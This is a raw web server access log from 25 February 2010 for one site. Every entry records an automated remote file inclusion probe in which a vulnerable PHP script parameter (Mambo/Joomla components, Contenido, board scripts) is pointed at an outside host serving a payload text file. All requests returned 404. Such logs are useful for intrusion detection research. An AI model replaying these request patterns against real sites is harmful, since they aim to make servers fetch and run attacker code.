110.45.145.178 - - [25/Feb/2010:07:31:30 -0800] "GET /logs/access_100201.log%20%20//amboard//?_SERVER%5BDOCUMENT_ROOT%5D=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.145.178 - - [25/Feb/2010:07:31:30 -0800] "GET /logs/access_100217.log%20%20//amboard//?_SERVER%5BDOCUMENT_ROOT%5D=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
202.124.116.194 - - [25/Feb/2010:07:31:57 -0800] "GET ///delete_comment.php?board_skin_path=http://www.4bwd.com//images/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
202.124.116.194 - - [25/Feb/2010:07:31:57 -0800] "GET /logs////delete_comment.php?board_skin_path=http://www.4bwd.com//images/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
202.124.116.194 - - [25/Feb/2010:07:31:57 -0800] "GET /logs/access_100203.log////delete_comment.php?board_skin_path=http://www.4bwd.com//images/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
202.124.116.194 - - [25/Feb/2010:07:32:32 -0800] "GET /logs/access_100206.log////delete_comment.php?board_skin_path=http://www.4bwd.com//images/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
76.74.150.155 - - [25/Feb/2010:07:32:34 -0800] "GET /logs/access_100206.log/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.kloeppen-stube.de//administrator/components/com_virtuemart/sql/other/ID1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.44.84.221 - - [25/Feb/2010:07:33:46 -0800] "GET /logs/access_100129.log%20%20//include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.44.84.221 - - [25/Feb/2010:07:33:46 -0800] "GET /include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.44.84.221 - - [25/Feb/2010:07:33:46 -0800] "GET /logs//include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.44.84.221 - - [25/Feb/2010:07:33:51 -0800] "GET /logs/access_100219.log%20%20//include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.44.84.221 - - [25/Feb/2010:07:35:49 -0800] "GET /logs/access_100212.log%20%20//booth.php?include_path=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.44.84.221 - - [25/Feb/2010:07:35:49 -0800] "GET /booth.php?include_path=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.44.84.221 - - [25/Feb/2010:07:35:49 -0800] "GET /logs//booth.php?include_path=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.152.132 - - [25/Feb/2010:07:36:53 -0800] "GET /logs/access_100219.log/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.152.132 - - [25/Feb/2010:07:36:57 -0800] "GET /logs/access_100219.log/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
202.124.116.194 - - [25/Feb/2010:07:36:58 -0800] "GET /logs////delete_comment.php?board_skin_path=http://kmgtusa.com/includes/iid1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
202.124.116.194 - - [25/Feb/2010:07:36:58 -0800] "GET /logs/access_100203.log%20%20////delete_comment.php?board_skin_path=http://kmgtusa.com/includes/iid1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
202.124.116.194 - - [25/Feb/2010:07:36:58 -0800] "GET ///delete_comment.php?board_skin_path=http://kmgtusa.com/includes/iid1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [25/Feb/2010:07:37:10 -0800] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://smkn-13bdg.sch.id/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [25/Feb/2010:07:37:10 -0800] "GET /logs/access_100125.log%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://smkn-13bdg.sch.id/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [25/Feb/2010:07:37:10 -0800] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://smkn-13bdg.sch.id/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [25/Feb/2010:07:37:18 -0800] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://smkn-13bdg.sch.id/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [25/Feb/2010:07:37:18 -0800] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://smkn-13bdg.sch.id/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [25/Feb/2010:07:37:18 -0800] "GET /logs/access_100125.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://smkn-13bdg.sch.id/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [25/Feb/2010:07:37:19 -0800] "GET /logs/access_100125.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://smkn-13bdg.sch.id/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [25/Feb/2010:07:37:19 -0800] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://smkn-13bdg.sch.id/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [25/Feb/2010:07:37:19 -0800] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://smkn-13bdg.sch.id/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [25/Feb/2010:07:37:19 -0800] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://smkn-13bdg.sch.id/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [25/Feb/2010:07:37:19 -0800] "GET /logs/access_100125.log%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://smkn-13bdg.sch.id/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [25/Feb/2010:07:37:20 -0800] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://smkn-13bdg.sch.id/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [25/Feb/2010:07:37:20 -0800] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://smkn-13bdg.sch.id/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [25/Feb/2010:07:37:20 -0800] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://smkn-13bdg.sch.id/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [25/Feb/2010:07:37:20 -0800] "GET /logs/access_100125.log%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://smkn-13bdg.sch.id/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [25/Feb/2010:07:37:26 -0800] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://smkn-13bdg.sch.id/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [25/Feb/2010:07:37:26 -0800] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://smkn-13bdg.sch.id/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [25/Feb/2010:07:37:26 -0800] "GET /logs/access_100125.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://smkn-13bdg.sch.id/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [25/Feb/2010:07:37:28 -0800] "GET /logs/access_100204.log%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://smkn-13bdg.sch.id/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [25/Feb/2010:07:37:38 -0800] "GET /logs/access_100204.log%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://smkn-13bdg.sch.id/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [25/Feb/2010:07:37:39 -0800] "GET /logs/access_100204.log%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://smkn-13bdg.sch.id/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.50.85.229 - - [25/Feb/2010:07:37:48 -0800] "GET /logs/access_100127.log/errors.php?error=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.50.85.229 - - [25/Feb/2010:07:37:48 -0800] "GET /logs/access_100129.log/errors.php?error=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.152.132 - - [25/Feb/2010:07:38:09 -0800] "GET /logs/access_100214.log/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [25/Feb/2010:07:38:18 -0800] "GET /init_basic.php?GALLERY_BASEDIR=http://smkn-13bdg.sch.id/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [25/Feb/2010:07:38:18 -0800] "GET /logs/access_100209.log%20%20//init_basic.php?GALLERY_BASEDIR=http://smkn-13bdg.sch.id/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [25/Feb/2010:07:38:18 -0800] "GET /logs//init_basic.php?GALLERY_BASEDIR=http://smkn-13bdg.sch.id/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.152.132 - - [25/Feb/2010:07:38:20 -0800] "GET /logs/access_100214.log/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [25/Feb/2010:07:38:59 -0800] "GET /logs/access_100217.log%20%20//init_basic.php?GALLERY_BASEDIR=http://smkn-13bdg.sch.id/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [25/Feb/2010:07:39:33 -0800] "GET /init_basic.php?GALLERY_BASEDIR=http://smkn-13bdg.sch.id/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [25/Feb/2010:07:39:33 -0800] "GET /logs/access_100209.log%20%20//init_basic.php?GALLERY_BASEDIR=http://smkn-13bdg.sch.id/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [25/Feb/2010:07:39:33 -0800] "GET /logs//init_basic.php?GALLERY_BASEDIR=http://smkn-13bdg.sch.id/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
82.179.244.69 - - [25/Feb/2010:07:39:52 -0800] "GET /WebKalender//tools/send_reminders.php?noSet=0&includedir=http://www.holod-guru.com/excel/Tests/templates/kontol.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.808" "www.puaga.com"
58.230.162.220 - - [25/Feb/2010:07:40:07 -0800] "GET /logs/access_100217.log%20%20//init_basic.php?GALLERY_BASEDIR=http://smkn-13bdg.sch.id/id1.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [25/Feb/2010:07:40:51 -0800] "GET /logs/access_100209.log%20%20//init_basic.php?GALLERY_BASEDIR=http://smkn-13bdg.sch.id/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [25/Feb/2010:07:40:51 -0800] "GET /init_basic.php?GALLERY_BASEDIR=http://smkn-13bdg.sch.id/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [25/Feb/2010:07:40:51 -0800] "GET /logs//init_basic.php?GALLERY_BASEDIR=http://smkn-13bdg.sch.id/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
202.124.116.194 - - [25/Feb/2010:07:41:07 -0800] "GET ///delete_comment.php?board_skin_path=http://kmgtusa.com/includes/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
202.124.116.194 - - [25/Feb/2010:07:41:07 -0800] "GET /logs////delete_comment.php?board_skin_path=http://kmgtusa.com/includes/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
202.124.116.194 - - [25/Feb/2010:07:41:11 -0800] "GET /logs/access_100203.log%20%20////delete_comment.php?board_skin_path=http://kmgtusa.com/includes/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [25/Feb/2010:07:41:24 -0800] "GET /logs/access_100217.log%20%20//init_basic.php?GALLERY_BASEDIR=http://smkn-13bdg.sch.id/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.36.175.10 - - [25/Feb/2010:07:42:10 -0800] "GET /logs//contenido/cronjobs/move_articles.php?cfg[path][contenido]=http://felcomz.fileave.com/ld1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.36.175.10 - - [25/Feb/2010:07:42:10 -0800] "GET /logs/access_100124.log%20%20//contenido/cronjobs/move_articles.php?cfg[path][contenido]=http://felcomz.fileave.com/ld1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.36.175.10 - - [25/Feb/2010:07:42:10 -0800] "GET /contenido/cronjobs/move_articles.php?cfg[path][contenido]=http://felcomz.fileave.com/ld1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
76.74.150.155 - - [25/Feb/2010:07:42:38 -0800] "GET /include.php?path[docroot]=http://www.kloeppen-stube.de//administrator/components/com_virtuemart/sql/other/ID1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
76.74.150.155 - - [25/Feb/2010:07:42:39 -0800] "GET /logs/access_100123.log%20%20//include.php?path[docroot]=http://www.kloeppen-stube.de//administrator/components/com_virtuemart/sql/other/ID1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
95.131.66.198 - - [25/Feb/2010:07:42:40 -0800] "GET /logs/access_100123.log%20%20//include.php?path[docroot]=http://www.kloeppen-stube.de//administrator/components/com_virtuemart/sql/other/ID1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
65.60.10.18 - - [25/Feb/2010:07:42:48 -0800] "GET //calendar//tools/send_reminders.=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
65.60.10.18 - - [25/Feb/2010:07:42:48 -0800] "GET /logs///calendar//tools/send_reminders.=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
65.60.10.18 - - [25/Feb/2010:07:42:48 -0800] "GET //calendar//tools/send_reminders.=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
65.60.10.18 - - [25/Feb/2010:07:42:48 -0800] "GET /logs/access_100125.log%20%20///calendar//tools/send_reminders.=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
65.60.10.18 - - [25/Feb/2010:07:42:48 -0800] "GET /logs///calendar//tools/send_reminders.=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
65.60.10.18 - - [25/Feb/2010:07:42:48 -0800] "GET /logs/access_100125.log%20%20///calendar//tools/send_reminders.=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
65.60.10.18 - - [25/Feb/2010:07:42:50 -0800] "GET //calendar//tools/send_reminders.=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
65.60.10.18 - - [25/Feb/2010:07:42:50 -0800] "GET /logs/access_100125.log%20%20///calendar//tools/send_reminders.=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
65.60.10.18 - - [25/Feb/2010:07:42:50 -0800] "GET /logs///calendar//tools/send_reminders.=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [25/Feb/2010:07:43:11 -0800] "GET /errors.php?error=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [25/Feb/2010:07:43:11 -0800] "GET /logs/access_100131.log%20%20/errors.php?error=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [25/Feb/2010:07:43:11 -0800] "GET /logs/errors.php?error=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [25/Feb/2010:07:43:16 -0800] "GET /logs/access_100118.log%20%20//errors.php?error=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [25/Feb/2010:07:43:16 -0800] "GET /logs//errors.php?error=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [25/Feb/2010:07:43:16 -0800] "GET /errors.php?error=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [25/Feb/2010:07:43:20 -0800] "GET /errors.php?error=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [25/Feb/2010:07:43:20 -0800] "GET /logs/access_100118.log%20%20//errors.php?error=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [25/Feb/2010:07:43:20 -0800] "GET /logs//errors.php?error=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.44.84.221 - - [25/Feb/2010:07:43:42 -0800] "GET /errors.php?error=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.44.84.221 - - [25/Feb/2010:07:43:42 -0800] "GET /logs//errors.php?error=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.44.84.221 - - [25/Feb/2010:07:43:42 -0800] "GET /logs/access_100118.log%20%20//errors.php?error=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
202.124.116.194 - - [25/Feb/2010:07:44:15 -0800] "GET /logs/access_100203.log////delete_comment.php?board_skin_path=http://kmgtusa.com/includes/iid1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
202.124.116.194 - - [25/Feb/2010:07:44:39 -0800] "GET /logs/access_100206.log////delete_comment.php?board_skin_path=http://kmgtusa.com/includes/iid1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.44.84.221 - - [25/Feb/2010:07:44:39 -0800] "GET /logs/access_100126.log%20%20//errors.php?error=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [25/Feb/2010:07:44:45 -0800] "GET /logs/access_100131.log%20%20//errors.php?error=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [25/Feb/2010:07:44:46 -0800] "GET /logs/access_100131.log%20%20//errors.php?error=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [25/Feb/2010:07:44:53 -0800] "GET /logs/access_100131.log%20%20/errors.php?error=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [25/Feb/2010:07:44:53 -0800] "GET /errors.php?error=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [25/Feb/2010:07:44:53 -0800] "GET /logs/errors.php?error=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.115.131.17 - - [25/Feb/2010:07:45:14 -0800] "GET ////download.php?board_skin_path=http://200.199.242.22/images/.ajim/ajim1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.115.131.17 - - [25/Feb/2010:07:45:14 -0800] "GET /logs/////download.php?board_skin_path=http://200.199.242.22/images/.ajim/ajim1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
202.124.116.194 - - [25/Feb/2010:07:45:14 -0800] "GET /logs/access_100203.log////delete_comment.php?board_skin_path=http://kmgtusa.com/includes/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.115.131.17 - - [25/Feb/2010:07:45:14 -0800] "GET /logs/access_100206.log/////download.php?board_skin_path=http://200.199.242.22/images/.ajim/ajim1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
202.124.116.194 - - [25/Feb/2010:07:45:34 -0800] "GET /logs/access_100206.log////delete_comment.php?board_skin_path=http://kmgtusa.com/includes/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.44.84.221 - - [25/Feb/2010:07:45:34 -0800] "GET ///write_comment_update.php?board_skin_path=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.44.84.221 - - [25/Feb/2010:07:45:34 -0800] "GET /logs/access_100203.log%20%20////write_comment_update.php?board_skin_path=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.44.84.221 - - [25/Feb/2010:07:45:34 -0800] "GET /logs////write_comment_update.php?board_skin_path=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.44.84.221 - - [25/Feb/2010:07:45:56 -0800] "GET /logs/access_100206.log%20%20////write_comment_update.php?board_skin_path=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
95.131.66.198 - - [25/Feb/2010:07:46:17 -0800] "GET /logs/access_100123.log//include.php?path[docroot]=http://www.kloeppen-stube.de//administrator/components/com_virtuemart/sql/other/ID1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
95.131.66.198 - - [25/Feb/2010:07:46:17 -0800] "GET /logs//include.php?path[docroot]=http://www.kloeppen-stube.de//administrator/components/com_virtuemart/sql/other/ID1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
95.131.66.198 - - [25/Feb/2010:07:46:17 -0800] "GET /include.php?path[docroot]=http://www.kloeppen-stube.de//administrator/components/com_virtuemart/sql/other/ID1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [25/Feb/2010:07:46:17 -0800] "GET //bbs///delete_all.php?board_skin_path=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [25/Feb/2010:07:46:17 -0800] "GET /logs///bbs///delete_all.php?board_skin_path=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [25/Feb/2010:07:46:17 -0800] "GET /logs/access_100203.log%20%20///bbs///delete_all.php?board_skin_path=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.36.175.10 - - [25/Feb/2010:07:46:23 -0800] "GET /contenido/cronjobs/move_articles.php?cfg[path][contenido]=http://felcomz.fileave.com/ld1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.36.175.10 - - [25/Feb/2010:07:46:23 -0800] "GET /logs//contenido/cronjobs/move_articles.php?cfg[path][contenido]=http://felcomz.fileave.com/ld1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.36.175.10 - - [25/Feb/2010:07:46:23 -0800] "GET /logs/access_100124.log//contenido/cronjobs/move_articles.php?cfg[path][contenido]=http://felcomz.fileave.com/ld1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [25/Feb/2010:07:46:33 -0800] "GET ///write_comment_update.php?board_skin_path=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [25/Feb/2010:07:46:33 -0800] "GET /logs/access_100203.log%20%20////write_comment_update.php?board_skin_path=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [25/Feb/2010:07:46:33 -0800] "GET /logs////write_comment_update.php?board_skin_path=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
76.74.150.155 - - [25/Feb/2010:07:46:35 -0800] "GET /logs/access_100129.log%20%20//include.php?path[docroot]=http://www.kloeppen-stube.de//administrator/components/com_virtuemart/sql/other/ID1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
